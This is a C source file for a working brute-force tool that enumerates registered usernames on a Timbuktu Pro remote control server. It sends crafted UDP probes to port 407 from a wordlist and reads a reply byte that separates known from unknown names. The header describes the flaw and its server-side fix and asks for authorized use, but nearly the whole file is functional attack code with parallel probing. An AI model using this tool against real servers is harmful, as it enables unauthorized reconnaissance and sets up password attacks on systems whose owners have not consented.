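/*
 * Timbuktu Pro Remote Control Program - Registered User Guessing Tool
 * by Conehead 03/05
 *
 * Brute-forces registered usernames against a target Timbuktu remote
 * control server's PLU database (UDP, port 407).
 *
 * The weakness exploited: the server answers a credential exchange for an
 * unknown username differently from one for a known username, so usernames
 * can be enumerated without ever supplying a valid password (the classic
 * "bad username" vs "bad password" distinction). The server-side fix is a
 * uniform failure response regardless of which part was wrong.
 *
 * Usernames are not case-sensitive and run from 1 to 31 characters.
 * There is no registered-user lockout, but the server DOES log attempts,
 * so every probe leaves a trace. Use only against systems you are
 * authorized to test.
 *
 * compile: gcc -o timbuktu_userbrute timbuktu_userbrute.c
 * usage:   timbuktu_userbrute <host> <usernames.txt> [connections]
 * example: timbuktu_userbrute 127.0.0.1 usernames.txt 1
 *
 * Note: running with more than one simultaneous connection appears to
 * confuse the server and produce false negatives. Run at your own risk!
 * Running single-connection instances distributed across hosts may be an
 * alternative.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define SERV_HOST_PORT 407
#define MAXMESSLEN 2048
#define MAXUSERNAMELEN 31

/* Line buffer for the wordlist; longer lines are skipped, not split. */
#define LINEBUFLEN 40

/*
 * Probe layout (as sent by the original tool): a 24-byte fixed header,
 * one byte holding the username length, then the username itself.
 */
#define PROBE_FIXED_LEN 24
#define PROBE_LEN_OFFSET 24
#define PROBE_HDR_LEN 25

/*
 * The reply is read as 36 bytes; byte 3 carries the verdict. 0xb7 there
 * is what the original tool treats as "username exists".
 */
#define REPLY_LEN 36
#define REPLY_VERDICT_OFFSET 3
#define REPLY_USER_EXISTS 0xb7

/* Seconds to wait for a reply before giving up on one probe. */
#define RECV_TIMEOUT_SEC 5

/*
 * functions:
 *   void UDP_handshake(int*, struct sockaddr_in)
 *   void timbuktu_cred_exchange(int, int, char*)
 *   void timbuktu_cli(int*, struct sockaddr_in, char*)
 */
void UDP_handshake(int *sockfd, struct sockaddr_in serv_addr);
void timbuktu_cred_exchange(int sockfd, int username_len, char *username);
void timbuktu_cli(int *sockfd, struct sockaddr_in serv_addr, char *username);

/*
 * Build the credential-exchange probe for `username` into `out`, which
 * must hold at least PROBE_HDR_LEN + MAXUSERNAMELEN bytes.
 *
 * Returns the number of bytes to send (PROBE_HDR_LEN + username_len), or
 * 0 when username_len is outside 1..MAXUSERNAMELEN. The length byte is
 * written directly instead of via the original 31-way switch, which left
 * it uninitialized for a zero-length name.
 */
static size_t build_probe(unsigned char *out, const char *username,
                          size_t username_len)
{
    static const unsigned char fixed_hdr[PROBE_FIXED_LEN] = {
        0x00, 0x23, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00,
    };

    if (username_len == 0 || username_len > MAXUSERNAMELEN)
        return 0;

    memcpy(out, fixed_hdr, sizeof fixed_hdr);
    out[PROBE_LEN_OFFSET] = (unsigned char)username_len;
    memcpy(out + PROBE_HDR_LEN, username, username_len);
    return PROBE_HDR_LEN + username_len;
}

/*
 * Return 1 if a REPLY_LEN-byte server reply marks the probed username as
 * existing (verdict byte == REPLY_USER_EXISTS), else 0.
 */
static int reply_indicates_known_user(const unsigned char *reply)
{
    return reply[REPLY_VERDICT_OFFSET] == REPLY_USER_EXISTS;
}

/*
 * Open a fresh UDP socket in *sockfd, connected to serv_addr, replacing
 * any socket already stored there. A receive timeout is set so an
 * unresponsive or filtered target does not hang a probe forever.
 *
 * Exits the process on socket/connect failure (as the original did).
 */
void UDP_handshake(int *sockfd, struct sockaddr_in serv_addr)
{
    struct timeval tv = { RECV_TIMEOUT_SEC, 0 };

    /* Only close a descriptor we actually own; -1 means "none yet". */
    if (*sockfd >= 0)
        close(*sockfd);

    *sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (*sockfd < 0) {
        perror("Client: can't open datagram socket");
        exit(-1);
    }

    /* Best effort: a missing timeout only means a possible hang. */
    if (setsockopt(*sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv) < 0)
        perror("Client: warning: can't set receive timeout");

    if (connect(*sockfd, (struct sockaddr *)&serv_addr, sizeof serv_addr) < 0) {
        perror("Client: can't connect to server");
        exit(-1);
    }
}

/*
 * Send one username probe over the connected socket and report on stdout
 * if the server's reply marks the name as registered.
 *
 * username_len must be 1..MAXUSERNAMELEN; username need not be
 * NUL-terminated beyond username_len but is printed with %s, so callers
 * pass a terminated buffer. Exits on send/receive failure or timeout.
 */
void timbuktu_cred_exchange(int sockfd, int username_len, char *username)
{
    unsigned char message[MAXMESSLEN];
    size_t probe_len;
    ssize_t n;

    if (username_len < 1 || username_len > MAXUSERNAMELEN) {
        fprintf(stderr, "Client: username length %d outside 1..%d\n",
                username_len, MAXUSERNAMELEN);
        exit(-1);
    }

    probe_len = build_probe(message, username, (size_t)username_len);

    /* Socket was connect()ed in UDP_handshake, so no destination here. */
    n = sendto(sockfd, message, probe_len, 0, NULL, 0);
    if (n < 0 || (size_t)n < probe_len) {
        perror("Client: sendto error on socket");
        exit(-1);
    }

    n = recvfrom(sockfd, message, REPLY_LEN, 0, NULL, 0);
    if (n < 0) {
        if (errno == EAGAIN || errno == EWOULDBLOCK)
            fprintf(stderr, "Client: no reply within %d seconds\n",
                    RECV_TIMEOUT_SEC);
        else
            perror("Client: recvfrom error");
        exit(-1);
    }
    if (n < REPLY_LEN) {
        /* Not an errno condition; don't let perror print a stale one. */
        fprintf(stderr, "Client: short reply (%zd bytes, expected %d)\n",
                n, REPLY_LEN);
        exit(-1);
    }

    if (reply_indicates_known_user(message))
        printf("%s is an existing username on the Timbuktu server!\n",
               username);
}

/*
 * Probe a single NUL-terminated username: open a connected socket into
 * *sockfd and run the credential exchange on it.
 */
void timbuktu_cli(int *sockfd, struct sockaddr_in serv_addr, char *username)
{
    size_t len;

    UDP_handshake(sockfd, serv_addr);
    len = strlen(username);
    timbuktu_cred_exchange(*sockfd, (int)len, username);
}

/*
 * Resolve `host` (dotted quad or hostname) into an IPv4 sockaddr on
 * SERV_HOST_PORT. Returns 0 on success, -1 after printing the error.
 *
 * Uses getaddrinfo, which also rejects malformed numeric addresses that
 * inet_addr would silently turn into 255.255.255.255.
 */
static int resolve_host(const char *host, struct sockaddr_in *addr)
{
    struct addrinfo hints, *res;
    int rc;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;      /* the protocol here is IPv4-only */
    hints.ai_socktype = SOCK_DGRAM;

    rc = getaddrinfo(host, NULL, &hints, &res);
    if (rc != 0) {
        fprintf(stderr, "Client: can't resolve %s: %s\n", host,
                gai_strerror(rc));
        return -1;
    }
    if (res->ai_addrlen < sizeof *addr) {
        fprintf(stderr, "Client: unexpected address size for %s\n", host);
        freeaddrinfo(res);
        return -1;
    }

    memset(addr, 0, sizeof *addr);
    memcpy(addr, res->ai_addr, sizeof *addr);
    addr->sin_port = htons(SERV_HOST_PORT);
    freeaddrinfo(res);
    return 0;
}

/*
 * Wait for `count` children. The original waited for only one child per
 * batch of num_connects, so concurrency and zombies grew without bound.
 */
static void reap_children(int count)
{
    int status;

    while (count-- > 0 && wait(&status) > 0)
        ;
}

/*
 * Consume the remainder of an over-long wordlist line so its tail is not
 * read back as a separate (bogus) username on the next fgets.
 */
static void drain_line(FILE *fp)
{
    int c;

    while ((c = fgetc(fp)) != EOF && c != '\n')
        ;
}

/*
 * Parse the optional connections argument. Must be >= 1: a zero or
 * negative value would mean "never wait", i.e. an unbounded fork storm.
 */
static long parse_connections(const char *arg)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(arg, &end, 10);
    if (end == arg || *end != '\0' || errno == ERANGE || v < 1) {
        fprintf(stderr, "connections must be a positive integer, got '%s'\n",
                arg);
        exit(-1);
    }
    return v;
}

/*
 * Entry point: argv[1] target host, argv[2] wordlist (one username per
 * line), optional argv[3] number of simultaneous probes (default 1).
 * Each username is probed in a forked child; the parent keeps at most
 * num_connects children in flight.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in serv_addr;
    FILE *fileptr;
    char user[LINEBUFLEN];
    char username[MAXUSERNAMELEN + 1];
    int sockfd = -1;            /* no socket yet; UDP_handshake opens one */
    long num_connects = 1;
    int child = 0;

    if (argc < 3) {
        fprintf(stderr,
                "usage: %s <host> <usernames.txt> [connections]\n", argv[0]);
        exit(1);
    }

    if (resolve_host(argv[1], &serv_addr) < 0)
        exit(-1);

    if (argc > 3)
        num_connects = parse_connections(argv[3]);

    fileptr = fopen(argv[2], "r");
    if (fileptr == NULL) {
        perror("fopen error");
        exit(-1);
    }

    while (fgets(user, sizeof user, fileptr)) {
        size_t len = strlen(user);
        pid_t id;

        /* Line did not fit: skip it whole rather than probing its tail. */
        if (len > 0 && user[len - 1] != '\n' && !feof(fileptr)) {
            drain_line(fileptr);
            fprintf(stderr, "skipping over-long line\n");
            continue;
        }

        /* Strip CR/LF so DOS-format wordlists and a missing final newline
         * both yield the bare username. */
        while (len > 0 && (user[len - 1] == '\n' || user[len - 1] == '\r'))
            user[--len] = '\0';

        if (len == 0)
            continue;
        if (len > MAXUSERNAMELEN) {
            fprintf(stderr, "skipping '%s': longer than %d characters\n",
                    user, MAXUSERNAMELEN);
            continue;
        }

        memset(username, 0, sizeof username);
        memcpy(username, user, len);

        id = fork();
        if (id < 0) {
            perror("An error occurred spawning the child");
            exit(-1);
        }
        if (id == 0) {
            timbuktu_cli(&sockfd, serv_addr, username);
            /* Flush our own output, then leave without exit(): the child
             * shares the parent's stdio state and must not flush or
             * reposition the parent's wordlist stream. */
            fflush(stdout);
            _exit(0);
        }

        if (++child == num_connects) {
            reap_children(child);
            child = 0;
        }
    }

    /* Collect the last partial batch so no probe result is lost. */
    reap_children(child);

    fclose(fileptr);
    if (sockfd >= 0)
        close(sockfd);
    exit(0);
}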